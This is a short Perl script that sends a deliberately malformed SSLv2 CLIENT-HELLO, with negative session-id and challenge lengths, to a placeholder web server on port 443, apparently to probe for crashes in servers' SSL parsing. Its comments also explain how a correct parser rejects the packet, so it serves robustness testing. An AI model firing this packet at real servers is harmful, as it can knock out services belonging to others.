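#!/usr/bin/perl -w
#
# Write a malformed SSL packet to the network.
# Some web servers have been known to trip over
# bad session id length (negative, or shorter than
# the actual amount of data supplied).
#
# A tool like ethereal (http://www.ethereal.org/) is
# invaluable for parsing SSL packets on the wire,
# and modifying the contents. (Ethereal was later
# renamed Wireshark.)
#
# Jon Thackray, Feb 2002
#
# What the packet exercises on the receiving side: an SSLv2
# CLIENT-HELLO whose declared lengths disagree with each other and
# with the bytes actually sent. A parser that handles it correctly
# reads every length field as unsigned and rejects the hello when
# cipher-spec + session-id + challenge lengths exceed the bytes left
# in the record, before it copies or indexes anything.
#

use strict;
use warnings;
use Socket;

# Host name is the placeholder from the original script.
my $host = "secure.somecompany.com";
my $port = 443;

# Resolve the target and build the packed socket address.
my $proto      = getprotobyname('tcp');
my $host_iaddr = inet_aton($host);
die("Couldn't resolve host name: $host\n") if (!defined($host_iaddr));
my $host_paddr = sockaddr_in($port, $host_iaddr);

# Lexical handle instead of the bareword SOCKET, so the descriptor is
# scoped to this script and passes `use strict`.
socket(my $sock, PF_INET, SOCK_STREAM, $proto) or die("Socket: $!\n");
connect($sock, $host_paddr) or die("Connect: $!\n");

# 18 bytes in total: a 2-byte record header followed by 16 bytes,
# although the header itself announces only 10.
my $nasty_ssl_packet = pack(
    "C*",
    0x80, 0x0a,    # SSLv2 length 10
    0x01,          # Client Hello (type 0x1)
    0x03, 0x00,    # Version number
    0x00, 0x10,    # Cipher spec length (16 bytes)
    0xff, 0xfd,    # Session id length (negative): 65533 unsigned, -3 as signed 16-bit
    0xff, 0xe9,    # Challenge length (negative): 65513 unsigned, -23 as signed 16-bit
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00    # Cipher spec and challenge data (7 bytes only)
);

# syswrite returns undef on error and may write fewer bytes than asked;
# the original ignored both, so a failed send looked like a clean run.
my $written = syswrite($sock, $nasty_ssl_packet);
die("Write: $!\n") if (!defined($written));
if ($written != length($nasty_ssl_packet)) {
    warn("Short write: $written of " . length($nasty_ssl_packet) . " bytes\n");
}

# Closing stays best-effort: the peer may already have dropped the
# connection, which is not a failure of this script.
close($sock) or warn("Close: $!\n");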